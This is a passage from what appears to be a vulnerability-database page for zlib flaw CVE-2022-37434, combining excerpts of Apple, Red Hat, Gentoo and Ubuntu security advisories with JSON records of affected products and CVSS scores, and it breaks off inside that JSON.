Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32924: Ian Beer of Google Project Zero
Kernel Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause kernel code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-42808: Zweig of Kunlun Lab
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom) Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42801: Ian Beer of Google Project Zero Entry added October 27, 2022
Safari Available for: Apple Watch Series 4 and later Impact: Visiting a maliciously crafted website may leak sensitive data Description: A logic issue was addressed with improved state management. CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago Entry added October 27, 2022
Sandbox Available for: Apple Watch Series 4 and later Impact: An app may be able to access user-sensitive data Description: An access issue was addressed with additional sandbox restrictions. CVE-2022-42811: Justin Bui (@slyd0g) of Snowflake
WebKit Available for: Apple Watch Series 4 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: The issue was addressed with improved UI handling. WebKit Bugzilla: 243693 CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. WebKit Bugzilla: 244622 CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 245058 CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University, Dohyun Lee (@l33d0hyun) of DNSLab at Korea University
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose internal states of the app Description: A correctness issue in the JIT was addressed with improved checks. WebKit Bugzilla: 242964 CVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab Entry added October 27, 2022
zlib Available for: Apple Watch Series 4 and later Impact: A user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-37434: Evgeny Legerov CVE-2022-42800: Evgeny Legerov Entry added October 27, 2022
Additional recognition
iCloud We would like to acknowledge Tim Michaud (@TimGMichaud) of Moveworks.ai for their assistance.
Kernel We would like to acknowledge Peter Nguyen of STAR Labs, Tim Michaud (@TimGMichaud) of Moveworks.ai, Tommy Muir (@Muirey03) for their assistance.
WebKit We would like to acknowledge Maddie Stone of Google Project Zero, Narendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an anonymous researcher for their assistance.
Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpQACgkQ4RjMIDke NxndmQ/9FlBich1M+naXLmjo/AyBTdlmBdFUH6cU92PspO7vrzTZl3Gl3dSjvGg0 TU7AGeAAvr278Zra0Hrm+D+w2BMAd3SSIjBXyum02lx0AGyyAFaPEDVq4CpxnqUG AEqBRrgoU9yZpTrIQXZlsnqphdv3KLVDzqqKlZjkPzIboYJ0I0c0HMP54618kx1n oBtoEEjPrIhH9LJyt37FbtgRntCzuuyistaxKGugZo4UDUt8hkHLKpYHf/5BNfWl /SaX1sy1ZJBoOezMC7/egaHPBbJRDnU3dXSQ7ON7h6w1Tc9NeUjXP0wf8BByeIko zJF5StfqfBKa3fR8wl0uM4CWDuHVtVjHAv5lWSqEQoEFoAjud+Ajjr5j3DJegVW7 Xp5Xu7W2XRR03dCM/SCQXMttr/Eu7z4EPJZD1W5y/UYH+ZwF4tq+4fxdrLOzPh4j uDLW+CWvF0d/+lVINDXzvzfQwEk77fbFJtUwL6Z5Sq95rtIL0/1OgtK/F/ODeyAX 8xYDCVdbn84K0/5K58NsvLS01XKXGISVY5yWrf3R7f69AVq7aiaaREY71pkuIwKf +aGpuOJibybGZqIOedMES/FCYuUqZF/0N7TJH8LpmlYt/T+fXjeJkupdeT+2vpcX iq3rTxsee+WgHhuR/3utIdIFZwVvgZBOadtHO6vIOQ1ce1QyLqI= =ZTUZ -----END PGP SIGNATURE-----
. Description:
The rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based Middleware Containers to address the following security issues. Users of these images are also encouraged to rebuild all container images that depend on these images.
Dockerfiles and scripts should be amended either to refer to this new image specifically, or to the latest image generally. Bugs fixed (https://bugzilla.redhat.com/):
2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding 2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens
- JIRA issues fixed (https://issues.jboss.org/):
CIAM-4412 - Build new OCP image for rh-sso-7/sso76-openshift-rhel8 CIAM-4413 - Generate new operator bundle image for this patch
- Bugs fixed (https://bugzilla.redhat.com/):
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2674 - Many can't remove non-existent inotify watch for: /var/log/pods/xxxxxx errors in logfilesmetricexporter container.
LOG-3042 - Logging view plugin removes part of LogQL query
LOG-3049 - [release-5.5] Resources associated with collector / fluentd keep on getting recreated
LOG-3127 - The alerts are Fluentd when type=vector
LOG-3138 - [release-5.5] the content of secret elasticsearch-metrics-token is recreated continually
LOG-3175 - [release-5.5] Vector healthcheck fails when forwarding logs to Cloudwatch
LOG-3213 - must-gather is empty for logging with CLO image
LOG-3234 - [release-5.5] Loki gateway is crashing because cipher-suites are not set
LOG-3251 - [release-5.5] Adding Valid Subscription Annotation
- Bugs fixed (https://bugzilla.redhat.com/):
2129679 - clusters belong to global clusterset is not selected by placement when rescheduling 2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function 2139085 - RHACM 2.6.3 images 2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements
- Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.8 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2121068 - CVE-2022-35949 nodejs: undici.request vulnerable to SSRF 2121101 - CVE-2022-35948 nodejs: undici vulnerable to CRLF via content headers 2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS 2130745 - RHACM 2.4.8 images
- Bugs fixed (https://bugzilla.redhat.com/):
2042826 - [SNO] the replicas of ingresscontroller/default is 2 on new installed SNO private cluster 2092839 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks 2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability 2099800 - Bump to kubernetes 1.24.6 2109487 - machine-controller is case sensitive which can lead to false/positive errors
- JIRA issues fixed (https://issues.jboss.org/):
OCPBUGS-1099 - Missing $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster OCPBUGS-1346 - OpenStack UPI scripts do not create server group for Computes OCPBUGS-1658 - Whereabouts should allow non default interfaces to Pod IP list [backport 4.11] OCPBUGS-1713 - Kuryr-Controller Restarting on KuryrPort with missing pod OCPBUGS-1955 - [4.11] Dual stack cluster fails on installation when multi-path routing entries exist OCPBUGS-1972 - [IPI on Baremetal] ipv6 support issue in metal3-httpd OCPBUGS-1984 - Install Helm chart form doesn't allow the user select a specific version OCPBUGS-2011 - [4.11] ironic clear_job_queue and reset_idrac pending issues OCPBUGS-2014 - CI: Backend unit tests fails because devfile registry was updated (mock response) OCPBUGS-2042 - [2102088] 4.11 CatalogSourcesUnhealthy error in subscription When upgrading ptp-operator OCPBUGS-2046 - Remove policy/v1beta1 in 4.11 and later OCPBUGS-2050 - [release-4.11] DNS operator does not reconcile the openshift-dns namespace OCPBUGS-2092 - Use floating tags in golang imagestream OCPBUGS-2112 - [release-4.11] Address e2e failures due to pod security OCPBUGS-2113 - [4.11] etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNO OCPBUGS-2140 - member loses rights after some other user login in openid / group sync OCPBUGS-2293 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgrade OCPBUGS-2320 - [release-4.11] Remove namespace and name from gathered DVO metrics OCPBUGS-2451 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name OCPBUGS-2528 - dns-default pod missing "target.workload.openshift.io/management:" annotation OCPBUGS-2606 - [release-4.11] go.mod should beworking with golang-1.17 and golang-1.18 OCPBUGS-2616 - e2e-gcp-builds is permafailing OCPBUGS-2626 - Worker creation fails within provider networks (as primary and secondary) OCPBUGS-2640 - prometheus-k8s-0 ends in CrashLoopBackOff with evel=error err="opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0" on SNO after hard reboot tests OCPBUGS-2658 - [4.11] VPA E2Es fail due to CSV name mismatch OCPBUGS-2766 - 'oc login' should be robust in the face of gather failures OCPBUGS-2780 - Import: Advanced option sentence is splited into two parts and headlines has no padding OCPBUGS-449 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10 OCPBUGS-526 - Prerelease report bug link should be updated to JIRA instead of Bugzilla OCPBUGS-668 - Prefer local dns does not work expectedly on OCPv4.11 OCPBUGS-673 - crio occasionally fails to start during deployment OCPBUGS-689 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM OCPBUGS-744 - [4.11] Spoke BMH stuck ?provisioning? after changing a BIOS attribute via the converged workflow OCPBUGS-947 - [4.11] Rebase openshift/etcd 4.11 onto 3.5.5 OCPBUGS-955 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation
-
Gentoo Linux Security Advisory GLSA 202210-42
https://security.gentoo.org/
Severity: Normal Title: zlib: Multiple vulnerabilities Date: October 31, 2022 Bugs: #863851, #835958 ID: 202210-42
Synopsis
A buffer overflow in zlib might allow an attacker to cause remote code execution.
Background
zlib is a widely used free and patent unencumbered data compression library.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-libs/zlib < 1.2.12-r3 >= 1.2.12-r3
Description
Multiple vulnerabilities have been discovered in zlib. Please review the CVE identifiers referenced below for details.
Impact
Maliciously crafted input handled by zlib may result in remote code execution.
Workaround
There is no known workaround at this time.
Resolution
All zlib users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-libs/zlib-1.2.12-r3"
References
[ 1 ] CVE-2018-25032 https://nvd.nist.gov/vuln/detail/CVE-2018-25032 [ 2 ] CVE-2022-37434 https://nvd.nist.gov/vuln/detail/CVE-2022-37434
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-42
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . Description:
Logging Subsystem 5.5.5 - Red Hat OpenShift
Security Fixe(s):
-
jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)
-
golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)
-
golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879, CVE-2022-2880, CVE-2022-41715)
-
jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)
-
jackson-databind: use of deeply nested arrays (CVE-2022-42004)
-
loader-utils: Regular expression denial of service (CVE-2022-37603)
-
golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY 2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays 2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster LOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch LOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn't support multiple CAs LOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. LOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. LOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value LOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed LOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue LOG-3310 - [release-5.5] Can't choose correct CA ConfigMap Key when creating lokistack in Console LOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config
- ========================================================================== Ubuntu Security Notice USN-6736-1 April 16, 2024
klibc vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 23.10
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)
Summary:
Several security issues were fixed in klibc.
Software Description: - klibc: small utilities built with klibc for early boot
Details:
It was discovered that zlib, vendored in klibc, incorrectly handled pointer arithmetic. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2016-9840, CVE-2016-9841)
Danilo Ramos discovered that zlib, vendored in klibc, incorrectly handled memory when performing certain deflating operations. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2018-25032)
Evgeny Legerov discovered that zlib, vendored in klibc, incorrectly handled memory when performing certain inflate operations. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2022-37434)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 23.10: klibc-utils 2.0.13-1ubuntu0.1 libklibc 2.0.13-1ubuntu0.1
Ubuntu 22.04 LTS: klibc-utils 2.0.10-4ubuntu0.1 libklibc 2.0.10-4ubuntu0.1
Ubuntu 20.04 LTS: klibc-utils 2.0.7-1ubuntu5.2 libklibc 2.0.7-1ubuntu5.2
Ubuntu 18.04 LTS (Available with Ubuntu Pro): klibc-utils 2.0.4-9ubuntu2.2+esm1 libklibc 2.0.4-9ubuntu2.2+esm1
Ubuntu 16.04 LTS (Available with Ubuntu Pro): klibc-utils 2.0.4-8ubuntu1.16.04.4+esm2 libklibc 2.0.4-8ubuntu1.16.04.4+esm2
Ubuntu 14.04 LTS (Available with Ubuntu Pro): klibc-utils 2.0.3-0ubuntu1.14.04.3+esm3 libklibc 2.0.3-0ubuntu1.14.04.3+esm3
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: OpenShift Container Platform 4.11.45 bug fix and security update Advisory ID: RHSA-2023:4053-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2023:4053 Issue date: 2023-07-19 CVE Names: CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-20838 CVE-2020-14155 CVE-2020-24370 CVE-2020-35525 CVE-2020-35527 CVE-2021-3580 CVE-2021-3634 CVE-2021-20231 CVE-2021-20232 CVE-2021-23177 CVE-2021-31566 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-40528 CVE-2022-1271 CVE-2022-1586 CVE-2022-1785 CVE-2022-1897 CVE-2022-1927 CVE-2022-4304 CVE-2022-4450 CVE-2022-21235 CVE-2022-24407 CVE-2022-29824 CVE-2022-34903 CVE-2022-37434 CVE-2022-38177 CVE-2022-38178 CVE-2022-40674 CVE-2022-42010 CVE-2022-42011 CVE-2022-42012 CVE-2022-42898 CVE-2022-47629 CVE-2023-0215 CVE-2023-0361 CVE-2023-1281 CVE-2023-24329 CVE-2023-32233 =====================================================================
- Summary:
Red Hat OpenShift Container Platform release 4.11.45 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.11.
Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.45. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2023:4052
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Security Fix(es):
- github.com/Masterminds/vcs: Command Injection via argument injection (CVE-2022-21235)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
You may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.
The sha values for the release are
(For x86_64 architecture) The image digest is sha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9
(For s390x architecture) The image digest is sha256:622b5361f95d1d512ea84f363ac06155cbb9ee28e85ccaae1acd80b98b660fa8
(For ppc64le architecture) The image digest is sha256:50c131cf85dfb00f258af350a46b85eff8fb8084d3e1617520cd69b59caeaff7
(For aarch64 architecture) The image digest is sha256:9e575c4ece9caaf31acbef246ccad71959cd5bf634e7cb284b0849ddfa205ad7
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2215317 - CVE-2022-21235 github.com/Masterminds/vcs: Command Injection via argument injection
- JIRA issues fixed (https://issues.redhat.com/):
OCPBUGS-15446 - (release-4.11) gather "gateway-mode-config" config map from "openshift-network-operator" namespace OCPBUGS-15532 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup') OCPBUGS-15645 - Can't use git lfs in BuildConfig git source with strategy Docker OCPBUGS-15739 - Environment cannot find Python OCPBUGS-15758 - [release-4.11] Bump Jenkins and Jenkins Agent Base image versions OCPBUGS-15942 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get "https://registry.centos.org/v2/": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host OCPBUGS-15966 - [4.12] MetalLB contains incorrect data Correct and incorrect MetalLB resources coexist should have correct statuses
- References:
https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-35525 https://access.redhat.com/security/cve/CVE-2020-35527 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3634 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-40528 https://access.redhat.com/security/cve/CVE-2022-1271 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-4304 https://access.redhat.com/security/cve/CVE-2022-4450 https://access.redhat.com/security/cve/CVE-2022-21235 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/cve/CVE-2022-29824 https://access.redhat.com/security/cve/CVE-2022-34903 https://access.redhat.com/security/cve/CVE-2022-37434 https://access.redhat.com/security/cve/CVE-2022-38177 https://access.redhat.com/security/cve/CVE-2022-38178 https://access.redhat.com/security/cve/CVE-2022-40674 https://access.redhat.com/security/cve/CVE-2022-42010 https://access.redhat.com/security/cve/CVE-2022-42011 https://access.redhat.com/security/cve/CVE-2022-42012 https://access.redhat.com/security/cve/CVE-2022-42898 https://access.redhat.com/security/cve/CVE-2022-47629 https://access.redhat.com/security/cve/CVE-2023-0215 https://access.redhat.com/security/cve/CVE-2023-0361 https://access.redhat.com/security/cve/CVE-2023-1281 https://access.redhat.com/security/cve/CVE-2023-24329 https://access.redhat.com/security/cve/CVE-2023-32233 https://access.redhat.com/security/updates/classification/#important https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "storagegrid",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "37"
},
{
"_id": null,
"model": "zlib",
"scope": "lte",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.12"
},
{
"_id": null,
"model": "iphone os",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "16.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.7.34"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "management services for element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.7.31"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.11.22"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.6.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.3.16"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.3.0"
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.11.0"
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.1"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.1"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 0.7
},
"cve": "CVE-2022-37434",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-37434",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-37434",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-37434",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"description": {
"_id": null,
